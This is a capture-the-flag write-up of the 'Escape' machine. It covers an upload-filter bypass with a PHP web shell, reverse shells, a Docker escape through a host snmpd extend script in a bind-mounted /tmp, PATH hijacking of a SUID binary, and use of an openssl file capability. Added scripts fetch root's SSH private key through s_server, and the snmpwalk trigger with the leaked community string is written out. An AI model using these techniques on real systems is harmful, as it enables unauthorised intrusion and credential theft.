ESCAPE

1-Nmap

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)

8080/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)

2-Gobuster

We found two open web ports, 80 and 8080. Both appear to serve the same site, but the one on port 8080 also has a directory called dev:

[Image: dev directory found by gobuster]

This directory is an upload form that only seems to accept .gif files. Enumerating inside it we find an uploads directory, which is where the uploaded files are stored:

[Image: uploads directory found by gobuster]

3-Burp Suite

Knowing this, we can upload a web shell and use it to send ourselves a reverse shell. The extension filter evidently only checks that .gif appears in the name, while Apache chooses the handler from the last extension, so we name the file webshell.gif.php to get past the filter and still have it executed as PHP. We put a simple PHP web shell in it and send the upload request from Burp Suite:

[Image: upload request for the web shell in Burp Suite]

The file is uploaded correctly:

[Image: file uploaded]

4-Web Shell

Now if we go to the uploads directory we find the web shell:

[Image: web shell in the uploads directory]

Now we use it to launch a PHP reverse shell towards our listener:

[Image: sending the reverse shell]

We get the reverse shell:

[Image: reverse shell received]

5-Docker

As soon as we have a stable shell we realize that we are in a container, because the hostname is a 12-character hex string, the short id of a Docker container:

[Image: container hostname]

And there is a file called /.dockerenv in the root directory:

[Image: /.dockerenv]

First let's see which block devices the container can see, with the lsblk command:

[Image: lsblk showing sda1]

lsblk shows sda1, a partition of the host's disk sda. Let's keep enumerating the container for clues with the mount command:

www-data@a7c367c2113d:/var/www$ mount
/dev/sda1 on /tmp type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)

The tmpfs on /dev is normal for a Docker container (Docker mounts a small tmpfs there for the device nodes) and does not give us anything. The interesting line is the first one: /dev/sda1, the host's disk partition, is mounted on /tmp. A container's own filesystem is an overlay, so a directory backed directly by the host's partition means a host directory has been bind-mounted into the container (as docker run -v does), and whatever we write to /tmp ends up on the host's filesystem. Let's confirm where /dev/sda1 is mounted:
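The same reasoning as a small script, added here as an example (my own code, not from the writeup). It parses mount output for mountpoints that are backed by a host block device and therefore reach the host filesystem, and it checks the usual container indicators. The mount lines in demo are constructed from the output above plus the entries a typical Docker container shows.

```shell
#!/bin/sh
# Added example, not from the writeup: container enumeration as a script.
# The sample mount output in demo() is constructed (the two lines from the
# box plus typical Docker entries), not a capture from the target.

# Read `mount` output on stdin and print mountpoints backed by a host block
# device. In a Docker container / is an overlay and /dev, /proc, /sys are
# tmpfs/proc/sysfs, so a mountpoint on /dev/sd*, /dev/vd*, /dev/nvme* or
# /dev/mapper/* is a host directory bind-mounted into the container.
# Docker always bind-mounts /etc/hosts, /etc/hostname and /etc/resolv.conf
# from the host, so those three are filtered out as noise.
host_backed_mounts() {
    awk '$1 ~ "^/dev/(sd|vd|nvme|mapper/)" && $3 !~ "^/etc/(hosts|hostname|resolv.conf)$" { print $3 }'
}

# Print the classic "am I in a container" signals that fire on this machine.
# On cgroup v2 hosts /proc/1/cgroup often shows only "0::/", so the last
# check is informative only when it fires.
container_indicators() {
    n=0
    if [ -f /.dockerenv ]; then
        echo "/.dockerenv exists"; n=$((n + 1))
    fi
    # Docker sets the hostname to the 12-hex-digit short container id
    case "$(hostname 2>/dev/null)" in
        [0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f])
            echo "hostname looks like a container id"; n=$((n + 1)) ;;
    esac
    if grep -qsE '(docker|containerd|lxc|kubepods)' /proc/1/cgroup; then
        echo "/proc/1/cgroup mentions a container runtime"; n=$((n + 1))
    fi
    echo "$n indicator(s) found"
}

demo() {
    echo "== host-backed mountpoints (constructed sample) =="
    printf '%s\n' \
        'overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/A:/var/lib/docker/overlay2/l/B,upperdir=/var/lib/docker/overlay2/X/diff,workdir=/var/lib/docker/overlay2/X/work)' \
        'proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)' \
        'tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)' \
        '/dev/sda1 on /tmp type ext4 (rw,relatime,errors=remount-ro,data=ordered)' \
        '/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)' \
        '/dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)' \
        '/dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)' \
        | host_backed_mounts
    echo "== container indicators on this machine =="
    container_indicators
}

demo
```

Inside a real container the first part is simply `mount | host_backed_mounts`; every path it prints is a place where a write from the container lands on the host, which is exactly what /tmp turned out to be here.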

[Image: /dev/sda1 mounted on /tmp]

We confirm that it is mounted on /tmp; we will keep this information for later. While enumerating we also find a backup of the snmpd service configuration in the /var/backups folder:

[Image: snmpd.conf in /var/backups]

We find the community string 53cur3M0NiT0riNg, which will be useful later:

[Image: rocommunity line with the community string]

A container normally runs a single service, and as we know this one is already running the web application, so we can infer that snmpd is running on the host. snmpd can be made to execute commands: the extend directive in snmpd.conf registers a script that snmpd runs and whose output it exposes through NET-SNMP-EXTEND-MIB, so querying that MIB, for instance with snmpwalk, makes the host run the script. We can query it with the rocommunity string we found, but first we have to install the snmp tools (snmpwalk is part of the snmp package) and the MIBs:

kali@kali:~$ sudo apt-get install snmp -y
kali@kali:~$ sudo apt-get install snmp-mibs-downloader -y
kali@kali:~$ sudo download-mibs

We also change the configuration of /etc/snmp/snmp.conf on our machine (the usual change is to comment out the "mibs :" line, so that the downloaded MIBs are loaded and snmpwalk can resolve names such as NET-SNMP-EXTEND-MIB):

[Image: modified snmp.conf]

We use snmpwalk with the community string against the host and it works:

The output shows an extend entry called shtest, so the host's snmpd runs a script by that name, and it looks for it in /tmp, the directory we just found bind-mounted into the container. Knowing that, we write a reverse shell into /tmp/shtest from inside the container and make it executable, so that it lands on the host where snmpd will run it:

[Image: reverse shell in shtest]

We start a listener on port 4444:

And we run snmpwalk again, which makes snmpd execute the script:

We receive the shell, as the Debian-snmp user that snmpd runs as on the host:

[Image: shell as Debian-snmp]
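What the snmpd.conf backup gave away, as an added example (my code, not the writeup's). It pulls the extend/exec entries and the unrestricted community strings out of an snmpd.conf and flags extend scripts that live in a world-writable directory. The sample config is constructed: the community string is the one found in the backup, but the writeup does not show the extend line, so extend shtest /tmp/shtest is an assumed reconstruction.

```shell
#!/bin/sh
# Added example, not from the writeup. Audits an snmpd.conf for the two
# things that were exploited here: a community string valid from anywhere
# and an "extend" script that an attacker can overwrite. The config in
# SAMPLE_CONF is constructed; "extend shtest /tmp/shtest" is an assumed
# reconstruction of the target's line, which the writeup does not show.

# Print "NAME PROG" for every extend / extend-sh / exec / sh directive.
# Syntax: extend [MIBOID] NAME PROG [ARGS]; the optional MIBOID starts with
# a dot or a digit. snmpd runs PROG whenever NET-SNMP-EXTEND-MIB
# (.1.3.6.1.4.1.8072.1.3.2) is queried, e.g. by snmpwalk.
snmp_extend_commands() {
    awk '
        /^[ \t]*#/ { next }
        $1 == "extend" || $1 == "extend-sh" || $1 == "exec" || $1 == "sh" {
            i = 2
            if ($2 ~ /^[.0-9]/) i++
            print $i, $(i + 1)
        }'
}

# Print community strings that any source address may use: rocommunity /
# rwcommunity with no SOURCE field, or with SOURCE "default".
snmp_open_communities() {
    awk '
        /^[ \t]*#/ { next }
        ($1 == "rocommunity" || $1 == "rwcommunity") && (NF == 2 || $3 == "default") {
            print $1, $2
        }'
}

# Read "NAME PROG" pairs and rate each program path. A script under /tmp,
# /var/tmp or /dev/shm, or in a directory that is world-writable on this
# machine, can be replaced by any local user (or, as here, by anyone who can
# write into a directory that is bind-mounted into a container).
extend_risk() {
    while read -r name prog; do
        dir=$(dirname "$prog")
        case "$prog" in
            /tmp/*|/var/tmp/*|/dev/shm/*)
                echo "$name $prog WRITABLE-DIR" ;;
            /*)
                if [ -d "$dir" ] && [ -n "$(find "$dir" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
                    echo "$name $prog WRITABLE-DIR"
                else
                    echo "$name $prog ok"
                fi ;;
            *)
                echo "$name $prog RELATIVE-PATH" ;;
        esac
    done
}

# Constructed sample snmpd.conf.
SAMPLE_CONF='# snmpd.conf recovered from /var/backups (constructed sample)
rocommunity 53cur3M0NiT0riNg
rocommunity s3cr3t 10.0.0.0/8
extend shtest /tmp/shtest
extend .1.3.6.1.4.1.2021.51 uptime /usr/bin/uptime'

demo() {
    echo "== community strings usable from any address =="
    printf '%s\n' "$SAMPLE_CONF" | snmp_open_communities
    echo "== extend scripts =="
    printf '%s\n' "$SAMPLE_CONF" | snmp_extend_commands | extend_risk
}

demo
```

The trigger used in the writeup is a walk of the extend subtree, `snmpwalk -v2c -c 53cur3M0NiT0riNg <host> NET-SNMP-EXTEND-MIB::nsExtendObjects`. The hardening follows from the two findings: give rocommunity a source restriction (or a read-only view that excludes the extend tree), and keep any extend script root-owned in a root-owned directory rather than under /tmp.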

6-Privilege Escalation

Now that we are on the host we can try to escalate privileges. If we look for SUID files we find one called logconsole:

We also see that the owner of this binary is tom, so it runs with tom's privileges:

7-ltrace

Let's use ltrace to see which library calls the binary makes and what it runs:

We find a menu with several options. Trying them out, we see that all of them run commands, and all of them use the command's absolute path except option 6, which calls lscpu by name only, so it is resolved through PATH:

Knowing this, we can create a shell script named lscpu that sends us a reverse shell and make it the one that gets found, by putting its directory at the front of the PATH variable:

[Image: reverse shell script named lscpu]

Now we change the variable:

And run option 6 of logconsole:

8-User Tom

With a listener on port 5555 we get a reverse shell as the user tom:

[Image: shell as tom]

Now that we are tom, after enumerating the machine we find that the openssl binary has a file capability set on it (as shown by getcap):

[Image: capability on OpenSSL]

With that we can use openssl's built-in TLS web server to serve files, which it will read with the capability rather than with tom's permissions. The first thing to do is to create a key and certificate with the following command:

tom@escape:/tmp$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

We leave all the prompts empty and the key and certificate are created:

[Image: cert.pem and key.pem]

Next we move to the root of the filesystem before starting the server, because it resolves requested paths relative to its current directory: started from /tmp, a request for /etc/passwd would look for /tmp/etc/passwd and not find it, whereas from / it serves the real file:

Now we connect via ssh in another terminal to be able to make the requests:

As we can see it works, so let's see whether the root user has an ssh key we can connect with:

Indeed it does, so we fetch root's private key through the server and use it to connect as root:

We get the root user!!
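The file read through openssl's own HTTPS server, end to end, as an added example (my code, not the writeup's). The writeup shows neither the server command nor the requests; openssl s_server -WWW, port 4443 and fetching with s_client are my assumptions about how it was done. Run on the box as tom it reads with openssl's capability; run anywhere else it simply shows the relative-path behaviour described above, using a constructed file.

```shell
#!/bin/sh
# Added example, not from the writeup. Serves files with openssl's built-in
# HTTPS server and fetches them over TLS. "s_server -WWW", the port and the
# use of s_client as the client are assumptions; the writeup shows neither
# the server command nor the requests. The file served in demo() is
# constructed. On the box, check the capability first with:
#   getcap /usr/bin/openssl

PORT=${PORT:-4443}

# Self-signed key and certificate without the interactive prompts.
make_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 365 -subj '/CN=localhost' \
        -keyout "$1/key.pem" -out "$1/cert.pem" >/dev/null 2>&1
}

# Start s_server -WWW with DOCROOT as its working directory. -WWW answers
# "GET /x/y" with the file x/y relative to the working directory, which is
# why the writeup starts it from /: "GET /etc/passwd" then opens /etc/passwd,
# whereas from /tmp it would look for /tmp/etc/passwd. KEYDIR must be an
# absolute path because of the cd.
start_server() {
    keydir=$1; docroot=$2
    ( cd "$docroot" && exec openssl s_server -accept "$PORT" -WWW \
          -key "$keydir/key.pem" -cert "$keydir/cert.pem" ) >/dev/null 2>&1 </dev/null &
    SERVER_PID=$!
    # wait until the port completes a TLS handshake
    tries=0
    while [ "$tries" -lt 20 ]; do
        if printf '' | openssl s_client -connect "127.0.0.1:$PORT" >/dev/null 2>&1; then
            return 0
        fi
        tries=$((tries + 1)); sleep 1
    done
    return 1
}

# GET PATH (given without the leading slash) over TLS and print only the
# response body; s_server -WWW prefixes it with a minimal HTTP/1.0 header.
fetch() {
    printf 'GET /%s HTTP/1.0\r\n\r\n' "$1" \
        | openssl s_client -quiet -connect "127.0.0.1:$PORT" 2>/dev/null \
        | tr -d '\r' | sed '1,/^$/d'
}

stop_server() {
    kill "$SERVER_PID" 2>/dev/null || true
    wait "$SERVER_PID" 2>/dev/null || true
}

demo() {
    tmp=$(mktemp -d)
    make_cert "$tmp"
    echo 'constructed sample file' > "$tmp/note.txt"
    if start_server "$tmp" "$tmp"; then
        echo "GET /note.txt with docroot $tmp ->"
        fetch note.txt
    else
        echo "server did not come up on port $PORT"
    fi
    stop_server
    rm -rf "$tmp"
}

demo
```

On the box the docroot is / and the interesting request is `fetch root/.ssh/id_rsa`, which is how the private key came out. A file capability on a general-purpose binary like openssl is the finding to report: any feature of the binary that opens a file (s_server -WWW, but also `openssl enc -in`, `dgst` or `base64 -in`) now reads with that capability.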
